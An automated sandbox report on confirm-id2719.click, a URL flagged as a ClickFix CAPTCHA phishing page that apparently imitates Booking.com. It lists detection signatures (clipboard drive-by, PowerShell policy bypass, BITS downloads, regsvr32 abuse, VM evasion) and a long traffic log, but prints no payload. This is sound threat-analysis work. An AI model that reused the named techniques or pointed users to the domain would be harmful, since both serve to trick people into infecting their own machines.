Windows Analysis Report
http://confirm-id2719.click/

General Information

Sample URL: http://confirm-id2719.click/
Analysis ID: 1701511
Infos: sigma

Detection

CAPTCHA Scam ClickFix
Score: 84
Range: 0 - 100
Confidence: 100%

Signatures

Detect drive by download via clipboard copy & paste
Yara detected CAPTCHA Scam ClickFix
Bypasses PowerShell execution policy
HTML page adds supicious text to clipboard
Loading BitLocker PowerShell Module
Obfuscated command line found
Powershell uses Background Intelligent Transfer Service (BITS)
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Suspicious PowerShell Parameter Substring
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Regsvr32 Commandline Flag Anomaly
Sigma detected: Scripting/CommandLine Process Spawned Regsvr32
Sigma detected: Usage Of Web Request Commands And Cmdlets

Classification

Phishing

Source: Yara match File source: 0.0.pages.csv, type: HTML
Source: Yara match File source: 0.1.pages.csv, type: HTML
Source: Yara match File source: 0.2.pages.csv, type: HTML
Source: unknown HTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.18:49733 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.57:443 -> 192.168.2.18:49735 version: TLS 1.2
Source: unknown HTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.18:49736 version: TLS 1.2
Source: unknown HTTPS traffic detected: 108.181.20.43:443 -> 192.168.2.18:49737 version: TLS 1.2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: chrome.exe Memory has grown: Private usage: 1MB later: 37MB
Source: unknown TCP traffic detected without corresponding DNS query: 20.189.173.7
Source: unknown TCP traffic detected without corresponding DNS query: 20.189.173.7
Source: unknown TCP traffic detected without corresponding DNS query: 20.189.173.7
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown TCP traffic detected without corresponding DNS query: 20.189.173.7
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown TCP traffic detected without corresponding DNS query: 20.189.173.7
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown TCP traffic detected without corresponding DNS query: 20.189.173.7
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: confirm-id2719.clickConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /static/manage_light.v14b6812v.css HTTP/1.1Host: confirm-id2719.clickConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://confirm-id2719.click/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /static/core_6136b7d7dc3346df1f4c9b379c38fa52.css HTTP/1.1Host: confirm-id2719.clickConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://confirm-id2719.click/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /Reservation_files/1df260bd9a2d14e1601c8c9ff1714c05acf328f8.svg HTTP/1.1Host: confirm-id2719.clickConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://confirm-id2719.click/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /Reservation_files/319302651.jpg HTTP/1.1Host: confirm-id2719.clickConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://confirm-id2719.click/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /Reservation_files/318586996.jpg HTTP/1.1Host: confirm-id2719.clickConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://confirm-id2719.click/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /Reservation_files/137927810.jpg HTTP/1.1Host: confirm-id2719.clickConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://confirm-id2719.click/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /themes/custom/booking/fonts/icons/icons.woff?v=1.3.3 HTTP/1.1host: partner.booking.comorigin: https://confirm-id2719.clicksec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: fontreferer: https://confirm-id2719.click/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1
Source: global traffic HTTP traffic detected: GET /Reservation_files/166939781.jpg HTTP/1.1Host: confirm-id2719.clickConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://confirm-id2719.click/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js HTTP/1.1Host: confirm-id2719.clickConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://confirm-id2719.click/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /Reservation_files/333642474.jpg HTTP/1.1Host: confirm-id2719.clickConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://confirm-id2719.click/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /Reservation_files/438648711.jpg HTTP/1.1Host: confirm-id2719.clickConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://confirm-id2719.click/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /Reservation_files/625bf8aec1510ce62b414074752052f184a60801.svg HTTP/1.1Host: confirm-id2719.clickConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://confirm-id2719.click/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /Reservation_files/b_logo_blue.png HTTP/1.1Host: confirm-id2719.clickConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://confirm-id2719.click/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /Reservation_files/no.png HTTP/1.1Host: confirm-id2719.clickConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://confirm-id2719.click/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /Reservation_files/319302672.jpg HTTP/1.1Host: confirm-id2719.clickConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://confirm-id2719.click/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /jquery-3.7.1.min.js HTTP/1.1host: code.jquery.comorigin: https://confirm-id2719.clicksec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: scriptreferer: https://confirm-id2719.click/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic HTTP traffic detected: GET /Reservation_files/protect.svg HTTP/1.1Host: confirm-id2719.clickConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://confirm-id2719.click/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /static/favicon.svg HTTP/1.1Host: confirm-id2719.clickConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://confirm-id2719.click/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /themes/custom/booking/images/favicons/site.webmanifest HTTP/1.1host: partner.booking.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*origin: https://confirm-id2719.clicksec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: manifestreferer: https://confirm-id2719.click/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=VRr5F+7gkvM5Kss&MD=Oh6bxDDd HTTP/1.1host: slscr.update.microsoft.comaccept: */*user-agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
Source: global traffic HTTP traffic detected: GET /antifraud HTTP/1.1Host: confirm-id2719.clickConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
